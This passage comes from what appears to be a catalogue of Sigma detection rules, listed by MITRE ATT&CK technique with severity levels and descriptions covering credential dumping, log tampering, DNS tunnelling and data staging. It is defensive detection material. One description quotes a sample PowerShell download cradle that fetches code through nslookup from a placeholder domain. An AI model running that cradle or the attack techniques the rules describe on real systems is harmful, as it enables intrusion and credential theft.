    Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
  • Use NTFS Short Name in Image - Level: medium
    Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
attack.t1003.003 25
Show Rules (25)
  • Possible Impacket SecretDump Remote Activity - Zeek - Level: high
    Description: Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml
  • Transferring Files with Credential Data via Network Shares - Zeek - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • Ntdsutil Abuse - Level: medium
    Description: Detects potential abuse of ntdsutil to dump ntds.dit database
  • Possible Impacket SecretDump Remote Activity - Level: high
    Description: Detect AD credential dumping using impacket secretdump HKTL
  • Transferring Files with Credential Data via Network Shares - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • Cred Dump Tools Dropped Files - Level: high
    Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
  • NTDS.DIT Created - Level: low
    Description: Detects creation of a file named "ntds.dit" (Active Directory Database)
  • NTDS.DIT Creation By Uncommon Parent Process - Level: high
    Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
  • NTDS.DIT Creation By Uncommon Process - Level: high
    Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
  • NTDS Exfiltration Filename Patterns - Level: high
    Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
  • Suspicious Get-ADDBAccount Usage - Level: high
    Description: Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers
  • Create Volume Shadow Copy with Powershell - Level: high
    Description: Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information
  • VolumeShadowCopy Symlink Creation Via Mklink - Level: high
    Description: Shadow Copies storage symbolic link creation using operating systems utilities
  • Esentutl Gather Credentials - Level: medium
    Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
  • Copying Sensitive Files with Credential Data - Level: high
    Description: Files with well-known filenames (sensitive files with credential data) copying
  • Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) - Level: medium
    Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.
  • Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) - Level: medium
    Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
  • PUA - DIT Snapshot Viewer - Level: high
    Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
  • Suspicious Process Patterns NTDS.DIT Exfil - Level: high
    Description: Detects suspicious process patterns used in NTDS.DIT exfiltration
  • Shadow Copies Creation Using Operating Systems Utilities - Level: medium
    Description: Shadow Copies creation using operating systems utilities, possible credential access
  • Active Directory Database Snapshot Via ADExplorer - Level: medium
    Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.
  • Suspicious Active Directory Database Snapshot Via ADExplorer - Level: high
    Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory.
  • Sensitive File Dump Via Wbadmin.EXE - Level: high
    Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
  • Sensitive File Recovery From Backup Via Wbadmin.EXE - Level: high
    Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
  • Potential Russian APT Credential Theft Activity - Level: critical
    Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
attack.t1552.001 24
Show Rules (24)
  • iOS Implant URL Pattern - Level: critical
    Description: Detects URL pattern used by iOS Implant
  • Suspicious Unattend.xml File Access - Level: medium
    Description: Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process
  • Abusing Findstr for Defense Evasion - Level: medium
    Description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
  • Azure Keyvault Key Modified or Deleted - Level: medium
    Description: Identifies when a Keyvault Key is modified or deleted in Azure.
  • Azure Key Vault Modified or Deleted - Level: medium
    Description: Identifies when a key vault is modified or deleted.
  • Azure Keyvault Secrets Modified or Deleted - Level: medium
    Description: Identifies when secrets are modified or deleted in Azure.
  • Credentials In Files - Linux - Level: high
    Description: Detecting attempts to extract passwords with grep
  • Copy Passwd Or Shadow From TMP Path - Level: high
    Description: Detects when the file "passwd" or "shadow" is copied from tmp path
  • Linux Recon Indicators - Level: high
    Description: Detects events with patterns found in commands used for reconnaissance on linux systems
  • Hidden Flag Set On File/Directory Via Chflags - MacOS - Level: medium
    Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
  • Credentials In Files - Level: high
    Description: Detecting attempts to extract passwords with grep and laZagne
  • Cisco Collect Data - Level: low
    Description: Collect pertinent data from the configuration files
  • HackTool - Typical HiveNightmare SAM File Export - Level: high
    Description: Detects files written by the different tools that exploit HiveNightmare
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Extracting Information with PowerShell - Level: medium
    Description: Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
  • Remote File Download Via Findstr.EXE - Level: medium
    Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
  • Insensitive Subfolder Search Via Findstr.EXE - Level: low
    Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
  • HackTool - WinPwn Execution - Level: high
    Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Automated Collection Command Prompt - Level: medium
    Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
  • Active Directory Database Snapshot Via ADExplorer - Level: medium
    Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.
  • Suspicious Active Directory Database Snapshot Via ADExplorer - Level: high
    Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory.
  • Potential Russian APT Credential Theft Activity - Level: critical
    Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
  • Unattend.XML File Access Attempt - Level: low
    Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored. This file is used during the unattended windows install process.
  • Potential Password Reconnaissance Via Findstr.EXE - Level: medium
    Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
attack.t1562.002 24
Show Rules (24)
  • Potential NT API Stub Patching - Level: medium
    Description: Detects potential NT API stub patching as seen used by the project PatchingAPI
  • ETW Logging/Processing Option Disabled On IIS Server - Level: medium
    Description: Detects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option.
  • HTTP Logging Disabled On IIS Server - Level: high
    Description: Detects changes to of the IIS server configuration in order to disable HTTP logging for successful requests.
  • New Module Module Added To IIS Server - Level: medium
    Description: Detects the addition of a new module to an IIS server.
  • Previously Installed IIS Module Was Removed - Level: low
    Description: Detects the removal of a previously installed IIS module.
  • Windows Event Auditing Disabled - Level: low
    Description: Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.
  • Important Windows Event Auditing Disabled - Level: high
    Description: Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.
  • EVTX Created In Uncommon Location - Level: medium
    Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
  • HackTool - SharpEvtMute DLL Load - Level: high
    Description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs
  • HackTool - SysmonEnte Execution - Level: high
    Description: Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon
  • Suspicious Svchost Process Access - Level: high
    Description: Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.
  • Audit Policy Tampering Via NT Resource Kit Auditpol - Level: high
    Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
  • Audit Policy Tampering Via Auditpol - Level: high
    Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
  • Filter Driver Unloaded Via Fltmc.EXE - Level: medium
    Description: Detect filter driver unloading activity via fltmc.exe
  • Sysmon Driver Unloaded Via Fltmc.EXE - Level: high
    Description: Detects possible Sysmon filter driver unloaded via fltmc.exe
  • HackTool - SharpEvtMute Execution - Level: high
    Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
  • Disable Windows IIS HTTP Logging - Level: high
    Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
  • Suspicious Eventlog Clearing or Configuration Change Activity - Level: high
    Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique were seen used by threat actors and ransomware strains in order to evade defenses.
  • Change Winevt Channel Access Permission Via Registry - Level: high
    Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
  • Disable Windows Event Logging Via Registry - Level: high
    Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
  • Potential EventLog File Location Tampering - Level: high
    Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
  • Forest Blizzard APT - File Creation Activity - Level: high
    Description: Detects the creation of specific files inside of ProgramData directory. These files were seen being created by Forest Blizzard as described by MSFT.
  • Forest Blizzard APT - JavaScript Constrained File Creation - Level: medium
    Description: Detects the creation of JavaScript files inside of the DriverStore directory. Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
attack.t1059.005 23
Show Rules (23)
  • Visual Basic Script Execution - Level: medium
    Description: Adversaries may abuse Visual Basic (VB) for execution
  • Adwind RAT / JRAT - Registry - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • File Was Not Allowed To Run - Level: medium
    Description: Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.
  • HackTool - CACTUSTORCH Remote Thread Creation - Level: high
    Description: Detects remote thread creation from CACTUSTORCH as described in references.
  • WScript or CScript Dropper - File - Level: high
    Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
  • Adwind RAT / JRAT File Artifact - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • Suspicious Child Process Of BgInfo.EXE - Level: high
    Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • Uncommon Child Process Of BgInfo.EXE - Level: medium
    Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • Csc.EXE Execution Form Potentially Suspicious Parent - Level: high
    Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • HackTool - Koadic Execution - Level: high
    Description: Detects command line parameters used by Koadic hack tool
  • Potential Reconnaissance Activity Via GatherNetworkInfo.VBS - Level: medium
    Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
  • Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS - Level: high
    Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
  • Windows Shell/Scripting Processes Spawning Suspicious Programs - Level: high
    Description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
  • Potential SquiblyTwo Technique Execution - Level: medium
    Description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
  • Potential Dropper Script Execution Via WScript/CScript - Level: medium
    Description: Detects wscript/cscript executions of scripts located in user directories
  • Cscript/Wscript Uncommon Script Extension Execution - Level: high
    Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
  • Suspicious Scripting in a WMI Consumer - Level: high
    Description: Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers
  • Adwind RAT / JRAT - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • Potential APT10 Cloud Hopper Activity - Level: high
    Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
  • Potential QBot Activity - Level: critical
    Description: Detects potential QBot activity by looking for process executions used previously by QBot
  • WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript - Level: medium
    Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
attack.t1566.001 21
Show Rules (21)
  • Disk Image Mounting Via Hdiutil - MacOS - Level: medium
    Description: Detects the execution of the hdiutil utility in order to mount disk images.
  • ISO Image Mounted - Level: medium
    Description: Detects the mount of an ISO image on an endpoint
  • Password Protected ZIP File Opened (Email Attachment) - Level: high
    Description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
  • Potential Initial Access via DLL Search Order Hijacking - Level: medium
    Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
  • ISO File Created Within Temp Folders - Level: high
    Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
  • ISO or Image Mount Indicator in Recent Files - Level: medium
    Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
  • Office Macro File Creation - Level: low
    Description: Detects the creation of a new office macro files on the systems
  • Office Macro File Download - Level: medium
    Description: Detects the creation of a new office macro files on the systems via an application (browser, mail client).
  • Office Macro File Creation From Suspicious Process - Level: high
    Description: Detects the creation of a office macro file from a a suspicious process
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • Suspicious HWP Sub Processes - Level: high
    Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
  • Suspicious Microsoft OneNote Child Process - Level: high
    Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
  • Suspicious Execution From Outlook Temporary Folder - Level: high
    Description: Detects a suspicious program execution in Outlook temp folder
  • Arbitrary Shell Command Execution Via Settingcontent-Ms - Level: medium
    Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
  • Suspicious Double Extension File Execution - Level: critical
    Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
  • Windows Registry Trust Record Modification - Level: medium
    Description: Alerts on trust record modification within the registry, indicating usage of macros
  • Exploit for CVE-2017-0261 - Level: medium
    Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
  • Droppers Exploiting CVE-2017-11882 - Level: critical
    Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
  • Exploit for CVE-2017-8759 - Level: critical
    Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
  • Ursnif Malware C2 URL Pattern - Level: critical
    Description: Detects Ursnif C2 traffic.
attack.t1087.002 20
Show Rules (20)
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP - Level: medium
    Description: Detects potential Active Directory enumeration via LDAP
  • AD Privileged Users or Groups Reconnaissance - Level: high
    Description: Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs
  • Potential AD User Enumeration From Non-Machine Account - Level: medium
    Description: Detects read access to a domain user from a non-machine account
  • Reconnaissance Activity - Level: high
    Description: Detects activity as "net user administrator /domain" and "net group domain admins /domain"
  • BloodHound Collection Files - Level: high
    Description: Detects default file names outputted by the BloodHound collection tool SharpHound
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Active Directory Computers Enumeration With Get-AdComputer - Level: low
    Description: Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory.
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Active Directory Structure Export Via Csvde.EXE - Level: medium
    Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • Suspicious Group And Account Reconnaissance Activity Using Net.EXE - Level: medium
    Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • PUA - AdFind Suspicious Execution - Level: high
    Description: Detects AdFind execution with common flags seen used during attacks
  • PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE - Level: high
    Description: Detects active directory enumeration activity using known AdFind CLI flags
  • Renamed AdFind Execution - Level: high
    Description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.
  • Suspicious Use of PsLogList - Level: medium
    Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
  • Enumeration via the Global Catalog - Level: medium
    Description: Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.
  • Domain User Enumeration Network Recon 01 - Level: medium
    Description: Domain user and group enumeration via network reconnaissance. Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller. The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29
attack.t1071.004 19
Show Rules (19)
  • DNS Tunnel Technique from MuddyWater - Level: critical
    Description: Detecting DNS tunnel activity for Muddywater actor
  • Nslookup PwSh Download Cradle - Level: medium
    Description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
  • Cobalt Strike DNS Beaconing - Level: critical
    Description: Detects suspicious DNS queries known from Cobalt Strike beacons
  • Suspicious DNS Query with B64 Encoded String - Level: medium
    Description: Detects suspicious DNS queries using base64 encoding
  • DNS TXT Answer with Possible Execution Strings - Level: high
    Description: Detects strings used in command execution in DNS TXT Answer
  • Suspicious Cobalt Strike DNS Beaconing - DNS Client - Level: critical
    Description: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
  • Suspicious Cobalt Strike DNS Beaconing - Sysmon - Level: critical
    Description: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IP report
  • DNS Exfiltration and Tunneling Tools Execution - Level: high
    Description: Well-known DNS Exfiltration tools execution
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Possible DNS Tunneling - Level: high
    Description: Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.
  • High NULL Records Requests Rate - Level: medium
    Description: Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution
  • High DNS Requests Rate - Level: medium
    Description: High DNS requests amount from host per short period of time
  • High TXT Records Requests Rate - Level: medium
    Description: Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution
  • High DNS Requests Rate - Firewall - Level: medium
    Description: High DNS requests amount from host per short period of time
  • DNSCat2 Powershell Implementation Detection Via Process Creation - Level: high
    Description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.
attack.t1059.007 19
Show Rules (19)
  • Adwind RAT / JRAT - Registry - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • Suspicious Installer Package Child Process - Level: medium
    Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
  • JXA In-memory Execution Via OSAScript - Level: high
    Description: Detects possible malicious execution of JXA in-memory via OSAScript
  • Potential In-Memory Download And Compile Of Payloads - Level: medium
    Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
  • File Was Not Allowed To Run - Level: medium
    Description: Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.
  • HackTool - CACTUSTORCH Remote Thread Creation - Level: high
    Description: Detects remote thread creation from CACTUSTORCH as described in references.
  • WScript or CScript Dropper - File - Level: high
    Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
  • Adwind RAT / JRAT File Artifact - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • Csc.EXE Execution Form Potentially Suspicious Parent - Level: high
    Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • HackTool - Koadic Execution - Level: high
    Description: Detects command line parameters used by Koadic hack tool
  • MSHTA Suspicious Execution 01 - Level: high
    Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
  • Node Process Executions - Level: medium
    Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
  • Potential SquiblyTwo Technique Execution - Level: medium
    Description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
  • Potential Dropper Script Execution Via WScript/CScript - Level: medium
    Description: Detects wscript/cscript executions of scripts located in user directories
  • Cscript/Wscript Uncommon Script Extension Execution - Level: high
    Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
  • Adwind RAT / JRAT - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript - Level: medium
    Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
attack.t1069.001 17
Show Rules (17)
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Local Groups Discovery - Linux - Level: low
    Description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
  • Local Groups Discovery - MacOs - Level: informational
    Description: Detects enumeration of local system groups
  • BloodHound Collection Files - Level: high
    Description: Detects default file names outputted by the BloodHound collection tool SharpHound
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • AD Groups Or Users Enumeration Using PowerShell - PoshModule - Level: low
    Description: Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
  • Suspicious Get Local Groups Information - Level: low
    Description: Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
  • Suspicious Get Information for SMB Share - PowerShell Module - Level: low
    Description: Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • AD Groups Or Users Enumeration Using PowerShell - ScriptBlock - Level: low
    Description: Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
  • Suspicious Get Local Groups Information - PowerShell - Level: low
    Description: Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
  • Suspicious Get Information for SMB Share - Level: low
    Description: Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Permission Check Via Accesschk.EXE - Level: medium
    Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
  • Local Groups Reconnaissance Via Wmic.EXE - Level: low
    Description: Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1560.001 17
Show Rules (17)
  • Data Compressed - Level: low
    Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Disk Image Mounting Via Hdiutil - MacOS - Level: medium
    Description: Detects the execution of the hdiutil utility in order to mount disk images.
  • Cisco Stage Data - Level: low
    Description: Various protocols maybe used to put data on the device for exfil or infil
  • Compress Data and Lock With Password for Exfiltration With 7-ZIP - Level: medium
    Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
  • 7Zip Compressing Dump Files - Level: medium
    Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
  • Suspicious Manipulation Of Default Accounts Via Net.EXE - Level: high
    Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc
  • Rar Usage with Password and Compression Level - Level: high
    Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
  • Files Added To An Archive Using Rar.EXE - Level: low
    Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Compressed File Creation Via Tar.EXE - Level: low
    Description: Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
  • Compressed File Extraction Via Tar.EXE - Level: low
    Description: Detects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.
  • Winrar Compressing Dump Files - Level: medium
    Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
  • Winrar Execution in Non-Standard Folder - Level: medium
    Description: Detects a suspicious winrar execution in a folder which is not the default installation folder
  • Compress Data and Lock With Password for Exfiltration With WINZIP - Level: medium
    Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
  • APT31 Judgement Panda Activity - Level: critical
